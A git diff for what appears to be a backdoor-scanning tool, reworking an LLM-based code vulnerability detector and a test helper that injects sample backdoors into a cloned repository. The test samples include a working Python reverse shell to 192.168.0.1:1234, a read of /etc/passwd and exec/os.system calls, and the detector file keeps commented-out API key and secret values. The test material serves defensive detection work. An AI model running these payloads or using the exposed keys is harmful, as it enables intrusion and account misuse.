diff --git a/detection/GPTdetection.py b/detection/GPTdetection.py index c098d56..d0e9690 100644 --- a/detection/GPTdetection.py +++ b/detection/GPTdetection.py @@ -92,6 +92,7 @@ def GPTdetectFileList(fileList): def GPTThread(filename, content, results): try: res = detectGPT(content) + # print(res) for key in res: if key != "none": # Exclude 'none' risk level results[key].extend( diff --git a/detection/__main__.py b/detection/__main__.py index 8ad6d04..a0be3bb 100644 --- a/detection/__main__.py +++ b/detection/__main__.py @@ -8,6 +8,7 @@ from reportlab.platypus import Paragraph, Spacer, SimpleDocTemplate from detection.pickle_detection import pickleDataDetection from .Regexdetection import find_dangerous_functions from .GPTdetection import detectGPT,GPTdetectFileList +# from .cngptdetection import detectGPT,GPTdetectFileList from .pyc_detection import disassemble_pyc from .utils import * import sys diff --git a/detection/cngptdetection.py b/detection/cngptdetection.py index 20a8a79..5a13c4d 100644 --- a/detection/cngptdetection.py +++ b/detection/cngptdetection.py @@ -1,16 +1,21 @@ import os +import threading +import time + import requests import re import json from typing import List, Dict, Any +from detection.utils import read_file_content + class TimeoutException(Exception): """自定义异常用于处理超时情况。""" pass -def detectGPT(content: str) -> str: +def detectGPT(content: str,token:str): """ 检测给定的代码内容中的潜在安全漏洞。 @@ -20,15 +25,8 @@ def detectGPT(content: str) -> str: 返回: - 分类后的漏洞信息的JSON字符串。 """ - api_key = os.getenv("BAIDU_API_KEY") - secret_key = os.getenv("BAIDU_SECRET_KEY") - #api_key = "DUBWNIrB6QJLOsLkpnEz2ZZa" - #secret_key = "9WK4HIV2n9r1ePPirqD4EQ6Ea33rH1m7" - if not api_key or not secret_key: - raise ValueError("BAIDU_API_KEY or BAIDU_SECRET_KEY is not set") - url = "https://aip.baidubce.com/rpc/2.0/ai_custom/v1/wenxinworkshop/chat/ernie-4.0-8k-0329?access_token=" + get_access_token( - api_key, secret_key) + url = "https://aip.baidubce.com/rpc/2.0/ai_custom/v1/wenxinworkshop/chat/ernie-4.0-8k-0329?access_token=" + token payload = json.dumps({ "messages": [ @@ -63,6 +61,7 @@ def detectGPT(content: str) -> str: classified_results = {"high": [], "medium": [], "low": [], "none": []} for res in extracted_data: + # print(res) try: line_number = int(res["Line"]) classified_results[res["Risk"]].append( @@ -71,7 +70,7 @@ def detectGPT(content: str) -> str: except (ValueError, IndexError, KeyError): continue - return json.dumps(classified_results, indent=2, ensure_ascii=False) + return classified_results def get_access_token(api_key: str, secret_key: str) -> str: @@ -110,4 +109,41 @@ def extract_json_from_text(text: str) -> List[Dict[str, Any]]: print(f"解码 JSON 时出错: {e}") return [] - return data \ No newline at end of file + return data + + +def GPTdetectFileList(fileList): + api_key = os.getenv("BAIDU_API_KEY") + secret_key = os.getenv("BAIDU_SECRET_KEY") + # api_key = "DUBWNIrB6QJLOsLkpnEz2ZZa" + # secret_key = "9WK4HIV2n9r1ePPirqD4EQ6Ea33rH1m7" + if not api_key or not secret_key: + raise ValueError("BAIDU_API_KEY or BAIDU_SECRET_KEY is not set") + # print(len(fileList)) + results = {"high": [], "medium": [], "low": [], "none": []} + threads = [] + token = get_access_token(api_key, secret_key) + # print(token) + for file in fileList: + content = read_file_content(str(file)) + threads.append(threading.Thread(target=GPTThread, args=(str(file), content, results,token))) + for thread in threads: + thread.start() + time.sleep(0.5) + for thread in threads: + thread.join() + return results + + +def GPTThread(filename, content, results,token): + + res = detectGPT(content,token) + # print(res) + for key in res: + if key != "none": # Exclude 'none' risk level + results[key].extend( + [ + (f"{filename}: Line {line_num}", line) + for line_num, line in res[key] + ] + ) diff --git a/tests/final_tests_util.py b/tests/final_tests_util.py index 58715cc..c7c414c 100644 --- a/tests/final_tests_util.py +++ b/tests/final_tests_util.py @@ -63,69 +63,39 @@ def inject_random_backdoor( # 示例1: 通过 os.system 执行命令 -backdoor1 = """ -import os -os.system('ls') -""" +backdoor1 = """import os +os.system('ls')""" # 示例2: 通过 subprocess 模块执行命令 -backdoor2 = """ -import subprocess -subprocess.call(['ls', '-l']) -""" +backdoor2 = """import subprocess +subprocess.call(['ls', '-l'])""" # 示例3: 打开一个反向 shell -backdoor3 = """ -import socket,subprocess,os +backdoor3 = """import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("192.168.0.1",1234)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) -subprocess.call(["/bin/sh","-i"]) -""" +subprocess.call(["/bin/sh","-i"])""" # 示例4: 通过 eval 执行任意代码 -backdoor4 = """ -code = "print('Hello, World!')" -eval(code) -""" +backdoor4 = """code = "print('Hello, World!')" +eval(code)""" # 示例5: 通过 exec 执行任意代码 -backdoor5 = """ -code = ''' +backdoor5 = """code = ''' import os os.system('ls') ''' -exec(code) -""" +exec(code)""" -# 示例6: 简单的 HTTP 服务器后门 -backdoor6 = """ -import http.server -import socketserver - -PORT = 8000 - -Handler = http.server.SimpleHTTPRequestHandler - -with socketserver.TCPServer(("", PORT), Handler) as httpd: - print("serving at port", PORT) - httpd.serve_forever() -""" # 示例7: 读取并显示文件内容 -backdoor7 = """ -with open('/etc/passwd', 'r') as file: +backdoor7 = """with open('/etc/passwd', 'r') as file: data = file.read() - print(data) -""" + print(data)""" -# 示例8: 无限循环 -backdoor8 = """ -while True: - print("This is a backdoor.") -""" backdoors = [ backdoor1, @@ -133,9 +103,7 @@ backdoors = [ backdoor3, backdoor4, backdoor5, - backdoor6, backdoor7, - backdoor8, ] @@ -183,4 +151,4 @@ if __name__ == "__main__": clone_dir = "/tmp/repo" clone_repo(repo_url, clone_dir) inject_random_backdoor(clone_dir) - inject_pickle_backdoor(clone_dir) + inject_pickle_backdoor(clone_dir) \ No newline at end of file